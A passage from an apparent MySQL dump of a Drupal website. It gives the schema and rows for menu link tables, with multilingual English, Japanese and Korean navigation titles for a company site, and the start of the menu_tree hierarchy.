) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The data table for menu_link_content entities.';

--
-- Dumping data for table `menu_link_content_data`
--

INSERT INTO `menu_link_content_data` (`id`, `revision_id`, `bundle`, `langcode`, `enabled`, `title`, `description`, `menu_name`, `link__uri`, `link__title`, `link__options`, `external`, `rediscover`, `weight`, `expanded`, `parent`, `changed`, `default_langcode`, `revision_translation_affected`, `content_translation_source`, `content_translation_outdated`, `content_translation_uid`, `content_translation_status`, `content_translation_created`) VALUES
(1, 1, 'menu_link_content', 'en', 1, 'About Us', NULL, 'main-menu', 'internal:/ko/node/1', '', 0x613a303a7b7d, 0, 1, -50, 0, NULL, 1688382745, 1, 1, 'und', 0, NULL, 1, NULL),
(1, 1, 'menu_link_content', 'ja', 1, '会社概要', NULL, 'main-menu', 'internal:/ko/node/1', '', 0x613a303a7b7d, 0, 1, -50, 0, NULL, 1690083479, 0, 1, 'en', 0, 2, 1, 1688382640),
(1, 1, 'menu_link_content', 'ko', 1, '회사 소개', NULL, 'main-menu', 'internal:/ko/node/1', '', 0x613a303a7b7d, 0, 1, -50, 0, NULL, 1787925207, 0, 1, 'en', 0, 2, 1, 1688382745),
(3, 3, 'menu_link_content', 'en', 1, 'Activities', NULL, 'main-menu', 'internal:/activities', '', 0x613a303a7b7d, 0, 1, -49, 0, 'menu_link_content:6bec1422-63fe-47ba-940d-fc00560c2bbe', 1787788653, 1, 1, 'und', 0, NULL, 1, NULL),
(3, 3, 'menu_link_content', 'ja', 1, '活動', NULL, 'main-menu', 'internal:/activities', '', 0x613a303a7b7d, 0, 1, -49, 0, 'menu_link_content:6bec1422-63fe-47ba-940d-fc00560c2bbe', 1787788653, 0, 1, 'en', 0, 2, 1, 1688383082),
(3, 3, 'menu_link_content', 'ko', 1, '활동', NULL, 'main-menu', 'internal:/activities', '', 0x613a303a7b7d, 0, 1, -49, 0, 'menu_link_content:6bec1422-63fe-47ba-940d-fc00560c2bbe', 1787788653, 0, 1, 'en', 0, 2, 1, 1688383091),
(4, 4, 'menu_link_content', 'en', 1, 'Contact Us', NULL, 'main-menu', 'internal:/ko/node/11', '', 0x613a303a7b7d, 0, 1, -47, 0, NULL, 1787788733, 1, 1, 'und', 0, NULL, 1, NULL),
(4, 4, 'menu_link_content', 'ja', 1, 'お問い合わせ', NULL, 'main-menu', 'internal:/ko/node/11', '', 0x613a303a7b7d, 0, 1, -47, 0, NULL, 1787788733, 0, 1, 'en', 0, 2, 1, 1688383165),
(4, 4, 'menu_link_content', 'ko', 1, '연락처', NULL, 'main-menu', 'internal:/ko/node/11', '', 0x613a303a7b7d, 0, 1, -47, 0, NULL, 1787788733, 0, 1, 'en', 0, 2, 1, 1688383177),
(5, 5, 'menu_link_content', 'en', 1, 'Company Profile', NULL, 'main-menu', 'internal:/ko/node/23', '', 0x613a303a7b7d, 0, 1, -50, 0, 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 1688384239, 1, 1, 'und', 0, NULL, 1, NULL),
(5, 5, 'menu_link_content', 'ja', 1, '会社情報', NULL, 'main-menu', 'internal:/ko/node/23', '', 0x613a303a7b7d, 0, 1, -50, 0, 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 1689918473, 0, 1, 'en', 0, 2, 1, 1688384218),
(5, 5, 'menu_link_content', 'ko', 1, '회사 설립', NULL, 'main-menu', 'internal:/ko/node/23', '', 0x613a303a7b7d, 0, 1, -50, 0, 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 1689918512, 0, 1, 'en', 0, 2, 1, 1688384239),
(6, 6, 'menu_link_content', 'en', 1, 'Our Services', NULL, 'main-menu', 'internal:/ko/node/24', '', 0x613a303a7b7d, 0, 1, -46, 0, 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 1689916128, 1, 1, 'und', 0, 2, 1, 1688381780),
(6, 6, 'menu_link_content', 'ja', 1, '事業内容', NULL, 'main-menu', 'internal:/ko/node/24', '', 0x613a303a7b7d, 0, 1, -46, 0, 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 1689918920, 0, 1, 'en', 0, 2, 1, 1688384330),
(6, 6, 'menu_link_content', 'ko', 1, '회사 서비스', NULL, 'main-menu', 'internal:/ko/node/24', '', 0x613a303a7b7d, 0, 1, -46, 0, 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 1689918954, 0, 1, 'en', 0, 2, 1, 1688384355),
(7, 7, 'menu_link_content', 'en', 1, 'Vision & Mission', NULL, 'main-menu', 'internal:/ko/node/25', '', 0x613a303a7b7d, 0, 1, -47, 0, 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 1689916128, 1, 1, 'und', 0, 2, 1, 1688381807),
(7, 7, 'menu_link_content', 'ja', 1, '目標&ミッション', NULL, 'main-menu', 'internal:/ko/node/25', '', 0x613a303a7b7d, 0, 1, -47, 0, 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 1689919005, 0, 1, 'en', 0, 2, 1, 1688384417),
(7, 7, 'menu_link_content', 'ko', 1, '우리의 비젼 & 우리의 미션', NULL, 'main-menu', 'internal:/ko/node/25', '', 0x613a303a7b7d, 0, 1, -47, 0, 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 1689918838, 0, 1, 'en', 0, 2, 1, 1688384429),
(8, 8, 'menu_link_content', 'en', 1, 'Future Goal', NULL, 'main-menu', 'internal:/ko/node/26', '', 0x613a303a7b7d, 0, 1, -48, 0, 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 1689916128, 1, 1, 'und', 0, 2, 1, 1688381829),
(8, 8, 'menu_link_content', 'ja', 1, '会社の目標', NULL, 'main-menu', 'internal:/ko/node/26', '', 0x613a303a7b7d, 0, 1, -48, 0, 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 1689918779, 0, 1, 'en', 0, 2, 1, 1688384525),
(8, 8, 'menu_link_content', 'ko', 1, '회사의 미래 비전', NULL, 'main-menu', 'internal:/ko/node/26', '', 0x613a303a7b7d, 0, 1, -48, 0, 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 1689918810, 0, 1, 'en', 0, 2, 1, 1688384540),
(9, 9, 'menu_link_content', 'en', 1, 'Company History', NULL, 'main-menu', 'internal:/ko/node/27', '', 0x613a303a7b7d, 0, 1, -49, 0, 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 1689916128, 1, 1, 'und', 0, 2, 1, 1688381842),
(9, 9, 'menu_link_content', 'ja', 1, '会社沿革', NULL, 'main-menu', 'internal:/ko/node/27', '', 0x613a303a7b7d, 0, 1, -49, 0, 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 1689922954, 0, 1, 'en', 0, 2, 1, 1688384620),
(9, 9, 'menu_link_content', 'ko', 1, '회사 연혁', NULL, 'main-menu', 'internal:/ko/node/27', '', 0x613a303a7b7d, 0, 1, -49, 0, 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 1690340399, 0, 1, 'en', 0, 2, 1, 1688384630),
(10, 10, 'menu_link_content', 'en', 1, 'Announcement', NULL, 'main-menu', 'internal:/announcement', '', 0x613a303a7b7d, 0, 1, -50, 0, 'menu_link_content:6bec1422-63fe-47ba-940d-fc00560c2bbe', 1787788653, 0, 1, 'ja', 0, 2, 1, 1692253965),
(10, 10, 'menu_link_content', 'ja', 1, 'お知らせ', NULL, 'main-menu', 'internal:/announcement', '', 0x613a303a7b7d, 0, 1, -50, 0, 'menu_link_content:6bec1422-63fe-47ba-940d-fc00560c2bbe', 1787788653, 1, 1, 'und', 0, 2, 1, 1692253895),
(10, 10, 'menu_link_content', 'ko', 1, '공지', NULL, 'main-menu', 'internal:/announcement', '', 0x613a303a7b7d, 0, 1, -50, 0, 'menu_link_content:6bec1422-63fe-47ba-940d-fc00560c2bbe', 1787788653, 0, 1, 'ja', 0, 2, 1, 1692253984),
(11, 11, 'menu_link_content', 'en', 1, 'Agencies', NULL, 'main-menu', 'internal:/', '', 0x613a303a7b7d, 0, 1, -48, 0, NULL, 1787789189, 1, 1, 'und', 0, 2, 1, 1787788636),
(11, 11, 'menu_link_content', 'ja', 1, '代理店', NULL, 'main-menu', 'internal:/', '', 0x613a303a7b7d, 0, 1, -48, 0, NULL, 1787789217, 0, 1, 'en', 0, 2, 1, 1787789217),
(11, 11, 'menu_link_content', 'ko', 1, '기관', NULL, 'main-menu', 'internal:/', '', 0x613a303a7b7d, 0, 1, -48, 0, NULL, 1787925316, 0, 1, 'en', 0, 2, 1, 1787925316),
(12, 12, 'menu_link_content', 'en', 1, 'Language Center', NULL, 'main-menu', 'internal:/language-center', '', 0x613a303a7b7d, 0, 1, -49, 0, NULL, 1787789071, 1, 1, 'und', 0, 2, 1, 1787788726),
(12, 12, 'menu_link_content', 'ja', 1, '語学センター', NULL, 'main-menu', 'internal:/language-center', '', 0x613a303a7b7d, 0, 1, -49, 0, NULL, 1787789120, 0, 1, 'en', 0, 2, 1, 1787789120),
(12, 12, 'menu_link_content', 'ko', 1, '언어 센터', NULL, 'main-menu', 'internal:/language-center', '', 0x613a303a7b7d, 0, 1, -49, 0, NULL, 1787925264, 0, 1, 'en', 0, 2, 1, 1787925264);

-- --------------------------------------------------------

--
-- Table structure for table `menu_link_content_field_revision`
--

CREATE TABLE `menu_link_content_field_revision` (
  `id` int UNSIGNED NOT NULL,
  `revision_id` int UNSIGNED NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `enabled` tinyint NOT NULL,
  `title` varchar(255) DEFAULT NULL,
  `description` varchar(255) DEFAULT NULL,
  `link__uri` varchar(2048) DEFAULT NULL COMMENT 'The URI of the link.',
  `link__title` varchar(255) DEFAULT NULL COMMENT 'The link text.',
  `link__options` longblob COMMENT 'Serialized array of options for the link.',
  `external` tinyint DEFAULT NULL,
  `changed` int DEFAULT NULL,
  `default_langcode` tinyint NOT NULL,
  `revision_translation_affected` tinyint DEFAULT NULL,
  `content_translation_source` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL,
  `content_translation_outdated` tinyint DEFAULT NULL,
  `content_translation_uid` int UNSIGNED DEFAULT NULL COMMENT 'The ID of the target entity.',
  `content_translation_status` tinyint DEFAULT NULL,
  `content_translation_created` int DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The revision data table for menu_link_content entities.';

--
-- Dumping data for table `menu_link_content_field_revision`
--

INSERT INTO `menu_link_content_field_revision` (`id`, `revision_id`, `langcode`, `enabled`, `title`, `description`, `link__uri`, `link__title`, `link__options`, `external`, `changed`, `default_langcode`, `revision_translation_affected`, `content_translation_source`, `content_translation_outdated`, `content_translation_uid`, `content_translation_status`, `content_translation_created`) VALUES
(1, 1, 'en', 1, 'About Us', NULL, 'internal:/ko/node/1', '', 0x613a303a7b7d, 0, 1688382745, 1, 1, 'und', 0, NULL, 1, NULL),
(1, 1, 'ja', 1, '会社概要', NULL, 'internal:/ko/node/1', '', 0x613a303a7b7d, 0, 1690083479, 0, 1, 'en', 0, 2, 1, 1688382640),
(1, 1, 'ko', 1, '회사 소개', NULL, 'internal:/ko/node/1', '', 0x613a303a7b7d, 0, 1787925207, 0, 1, 'en', 0, 2, 1, 1688382745),
(3, 3, 'en', 1, 'Activities', NULL, 'internal:/activities', '', 0x613a303a7b7d, 0, 1787788653, 1, 1, 'und', 0, NULL, 1, NULL),
(3, 3, 'ja', 1, '活動', NULL, 'internal:/activities', '', 0x613a303a7b7d, 0, 1787788653, 0, 1, 'en', 0, 2, 1, 1688383082),
(3, 3, 'ko', 1, '활동', NULL, 'internal:/activities', '', 0x613a303a7b7d, 0, 1787788653, 0, 1, 'en', 0, 2, 1, 1688383091),
(4, 4, 'en', 1, 'Contact Us', NULL, 'internal:/ko/node/11', '', 0x613a303a7b7d, 0, 1787788733, 1, 1, 'und', 0, NULL, 1, NULL),
(4, 4, 'ja', 1, 'お問い合わせ', NULL, 'internal:/ko/node/11', '', 0x613a303a7b7d, 0, 1787788733, 0, 1, 'en', 0, 2, 1, 1688383165),
(4, 4, 'ko', 1, '연락처', NULL, 'internal:/ko/node/11', '', 0x613a303a7b7d, 0, 1787788733, 0, 1, 'en', 0, 2, 1, 1688383177),
(5, 5, 'en', 1, 'Company Profile', NULL, 'internal:/ko/node/23', '', 0x613a303a7b7d, 0, 1688384239, 1, 1, 'und', 0, NULL, 1, NULL),
(5, 5, 'ja', 1, '会社情報', NULL, 'internal:/ko/node/23', '', 0x613a303a7b7d, 0, 1689918473, 0, 1, 'en', 0, 2, 1, 1688384218),
(5, 5, 'ko', 1, '회사 설립', NULL, 'internal:/ko/node/23', '', 0x613a303a7b7d, 0, 1689918512, 0, 1, 'en', 0, 2, 1, 1688384239),
(6, 6, 'en', 1, 'Our Services', NULL, 'internal:/ko/node/24', '', 0x613a303a7b7d, 0, 1689916128, 1, 1, 'und', 0, 2, 1, 1688381780),
(6, 6, 'ja', 1, '事業内容', NULL, 'internal:/ko/node/24', '', 0x613a303a7b7d, 0, 1689918920, 0, 1, 'en', 0, 2, 1, 1688384330),
(6, 6, 'ko', 1, '회사 서비스', NULL, 'internal:/ko/node/24', '', 0x613a303a7b7d, 0, 1689918954, 0, 1, 'en', 0, 2, 1, 1688384355),
(7, 7, 'en', 1, 'Vision & Mission', NULL, 'internal:/ko/node/25', '', 0x613a303a7b7d, 0, 1689916128, 1, 1, 'und', 0, 2, 1, 1688381807),
(7, 7, 'ja', 1, '目標&ミッション', NULL, 'internal:/ko/node/25', '', 0x613a303a7b7d, 0, 1689919005, 0, 1, 'en', 0, 2, 1, 1688384417),
(7, 7, 'ko', 1, '우리의 비젼 & 우리의 미션', NULL, 'internal:/ko/node/25', '', 0x613a303a7b7d, 0, 1689918838, 0, 1, 'en', 0, 2, 1, 1688384429),
(8, 8, 'en', 1, 'Future Goal', NULL, 'internal:/ko/node/26', '', 0x613a303a7b7d, 0, 1689916128, 1, 1, 'und', 0, 2, 1, 1688381829),
(8, 8, 'ja', 1, '会社の目標', NULL, 'internal:/ko/node/26', '', 0x613a303a7b7d, 0, 1689918779, 0, 1, 'en', 0, 2, 1, 1688384525),
(8, 8, 'ko', 1, '회사의 미래 비전', NULL, 'internal:/ko/node/26', '', 0x613a303a7b7d, 0, 1689918810, 0, 1, 'en', 0, 2, 1, 1688384540),
(9, 9, 'en', 1, 'Company History', NULL, 'internal:/ko/node/27', '', 0x613a303a7b7d, 0, 1689916128, 1, 1, 'und', 0, 2, 1, 1688381842),
(9, 9, 'ja', 1, '会社沿革', NULL, 'internal:/ko/node/27', '', 0x613a303a7b7d, 0, 1689922954, 0, 1, 'en', 0, 2, 1, 1688384620),
(9, 9, 'ko', 1, '회사 연혁', NULL, 'internal:/ko/node/27', '', 0x613a303a7b7d, 0, 1690340399, 0, 1, 'en', 0, 2, 1, 1688384630),
(10, 10, 'en', 1, 'Announcement', NULL, 'internal:/announcement', '', 0x613a303a7b7d, 0, 1787788653, 0, 1, 'ja', 0, 2, 1, 1692253965),
(10, 10, 'ja', 1, 'お知らせ', NULL, 'internal:/announcement', '', 0x613a303a7b7d, 0, 1787788653, 1, 1, 'und', 0, 2, 1, 1692253895),
(10, 10, 'ko', 1, '공지', NULL, 'internal:/announcement', '', 0x613a303a7b7d, 0, 1787788653, 0, 1, 'ja', 0, 2, 1, 1692253984),
(11, 11, 'en', 1, 'Agencies', NULL, 'internal:/', '', 0x613a303a7b7d, 0, 1787789189, 1, 1, 'und', 0, 2, 1, 1787788636),
(11, 11, 'ja', 1, '代理店', NULL, 'internal:/', '', 0x613a303a7b7d, 0, 1787789217, 0, 1, 'en', 0, 2, 1, 1787789217),
(11, 11, 'ko', 1, '기관', NULL, 'internal:/', '', 0x613a303a7b7d, 0, 1787925316, 0, 1, 'en', 0, 2, 1, 1787925316),
(12, 12, 'en', 1, 'Language Center', NULL, 'internal:/language-center', '', 0x613a303a7b7d, 0, 1787789071, 1, 1, 'und', 0, 2, 1, 1787788726),
(12, 12, 'ja', 1, '語学センター', NULL, 'internal:/language-center', '', 0x613a303a7b7d, 0, 1787789120, 0, 1, 'en', 0, 2, 1, 1787789120),
(12, 12, 'ko', 1, '언어 센터', NULL, 'internal:/language-center', '', 0x613a303a7b7d, 0, 1787925264, 0, 1, 'en', 0, 2, 1, 1787925264);

-- --------------------------------------------------------

--
-- Table structure for table `menu_link_content_revision`
--

CREATE TABLE `menu_link_content_revision` (
  `id` int UNSIGNED NOT NULL,
  `revision_id` int UNSIGNED NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `revision_user` int UNSIGNED DEFAULT NULL COMMENT 'The ID of the target entity.',
  `revision_created` int DEFAULT NULL,
  `revision_log_message` longtext,
  `revision_default` tinyint DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The revision table for menu_link_content entities.';

--
-- Dumping data for table `menu_link_content_revision`
--

INSERT INTO `menu_link_content_revision` (`id`, `revision_id`, `langcode`, `revision_user`, `revision_created`, `revision_log_message`, `revision_default`) VALUES
(1, 1, 'en', NULL, 1687229404, NULL, 1),
(3, 3, 'en', NULL, 1687229426, NULL, 1),
(4, 4, 'en', NULL, 1687229435, NULL, 1),
(5, 5, 'en', NULL, 1688381657, NULL, 1),
(6, 6, 'en', NULL, 1688381780, NULL, 1),
(7, 7, 'en', NULL, 1688381807, NULL, 1),
(8, 8, 'en', NULL, 1688381829, NULL, 1),
(9, 9, 'en', NULL, 1688381842, NULL, 1),
(10, 10, 'ja', NULL, 1692253895, NULL, 1),
(11, 11, 'en', NULL, 1787788636, NULL, 1),
(12, 12, 'en', NULL, 1787788726, NULL, 1);

-- --------------------------------------------------------

--
-- Table structure for table `menu_tree`
--

CREATE TABLE `menu_tree` (
  `menu_name` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The menu name. All links with the same menu name (such as ''tools'') are part of the same menu.',
  `mlid` int UNSIGNED NOT NULL COMMENT 'The menu link ID (mlid) is the integer primary key.',
  `id` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'Unique machine name: the plugin ID.',
  `parent` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The plugin ID for the parent of this link.',
  `route_name` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL COMMENT 'The machine name of a defined Symfony Route this menu link represents.',
  `route_param_key` varchar(255) DEFAULT NULL COMMENT 'An encoded string of route parameters for loading by route.',
  `route_parameters` longblob COMMENT 'Serialized array of route parameters of this menu link.',
  `url` varchar(255) NOT NULL DEFAULT '' COMMENT 'The external path this link points to (when not using a route).',
  `title` longblob COMMENT 'The serialized title for the link. May be a TranslatableMarkup.',
  `description` longblob COMMENT 'The serialized description of this link - used for admin pages and title attribute. May be a TranslatableMarkup.',
  `class` text COMMENT 'The class for this link plugin.',
  `options` longblob COMMENT 'A serialized array of URL options, such as a query string or HTML attributes.',
  `provider` varchar(50) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT 'system' COMMENT 'The name of the module that generated this link.',
  `enabled` smallint NOT NULL DEFAULT '1' COMMENT 'A flag for whether the link should be rendered in menus. (0 = a disabled menu link that may be shown on admin screens, 1 = a normal, visible link)',
  `discovered` smallint NOT NULL DEFAULT '0' COMMENT 'A flag for whether the link was discovered, so can be purged on rebuild',
  `expanded` smallint NOT NULL DEFAULT '0' COMMENT 'Flag for whether this link should be rendered as expanded in menus - expanded links always have their child links displayed, instead of only when the link is in the active trail (1 = expanded, 0 = not expanded)',
  `weight` int NOT NULL DEFAULT '0' COMMENT 'Link weight among links in the same menu at the same depth.',
  `metadata` longblob COMMENT 'A serialized array of data that may be used by the plugin instance.',
  `has_children` smallint NOT NULL DEFAULT '0' COMMENT 'Flag indicating whether any enabled links have this link as a parent (1 = enabled children exist, 0 = no enabled children).',
  `depth` smallint NOT NULL DEFAULT '0' COMMENT 'The depth relative to the top level. A link with empty parent will have depth == 1.',
  `p1` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The first mlid in the materialized path. If N = depth, then pN must equal the mlid. If depth > 1 then p(N-1) must equal the parent link mlid. All pX where X > depth must equal zero. The columns p1 .. p9 are also called the parents.',
  `p2` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The second mlid in the materialized path. See p1.',
  `p3` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The third mlid in the materialized path. See p1.',
  `p4` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The fourth mlid in the materialized path. See p1.',
  `p5` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The fifth mlid in the materialized path. See p1.',
  `p6` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The sixth mlid in the materialized path. See p1.',
  `p7` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The seventh mlid in the materialized path. See p1.',
  `p8` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The eighth mlid in the materialized path. See p1.',
  `p9` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The ninth mlid in the materialized path. See p1.',
  `form_class` varchar(255) DEFAULT NULL COMMENT 'meh'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Contains the menu tree hierarchy.';

--
-- Dumping data for table `menu_tree`
--

INSERT INTO `menu_tree` (`menu_name`, `mlid`, `id`, `parent`, `route_name`, `route_param_key`, `route_parameters`, `url`, `title`, `description`, `class`, `options`, `provider`, `enabled`, `discovered`, `expanded`, `weight`, `metadata`, `has_children`, `depth`, `p1`, `p2`, `p3`, `p4`, `p5`, `p6`, `p7`, `p8`, `p9`, `form_class`) VALUES
('footer', 1, 'contact.site_page', '', 'contact.site_page', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a22436f6e74616374223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'contact', 1, 1, 0, 0, 0x613a303a7b7d, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('tools', 2, 'filter.tips_all', '', 'filter.tips_all', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22436f6d706f73652074697073223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'filter', 0, 1, 0, 0, 0x613a303a7b7d, 0, 1, 2, 0, 0, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('tools', 3, 'node.add_page', '', 'node.add_page', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31313a2241646420636f6e74656e74223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'node', 1, 1, 0, 0, 0x613a303a7b7d, 0, 1, 3, 0, 0, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('tools', 4, 'search.view', '', 'search.view', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a22536561726368223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'search', 0, 1, 0, 0, 0x613a303a7b7d, 0, 1, 4, 0, 0, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('main', 5, 'standard.front_page', '', '<front>', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a22486f6d65223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'standard', 1, 1, 0, 0, 0x613a303a7b7d, 0, 1, 5, 0, 0, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 6, 'system.admin', '', 'system.admin', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a2241646d696e697374726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, 9, 0x613a303a7b7d, 1, 1, 6, 0, 0, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 7, 'help.main', 'system.admin', 'help.main', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a2248656c70223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34383a225265666572656e636520666f722075736167652c20636f6e66696775726174696f6e2c20616e64206d6f64756c65732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'help', 1, 1, 0, 9, 0x613a303a7b7d, 0, 2, 6, 7, 0, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 8, 'system.admin_content', 'system.admin', 'system.admin_content', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a22436f6e74656e74223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32343a2246696e6420616e64206d616e61676520636f6e74656e742e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -10, 0x613a303a7b7d, 1, 2, 6, 8, 0, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 9, 'comment.admin', 'system.admin_content', 'comment.admin', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a22436f6d6d656e7473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a35393a224c69737420616e642065646974207369746520636f6d6d656e747320616e642074686520636f6d6d656e7420617070726f76616c2071756575652e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'comment', 1, 1, 0, 0, 0x613a303a7b7d, 0, 3, 6, 8, 9, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
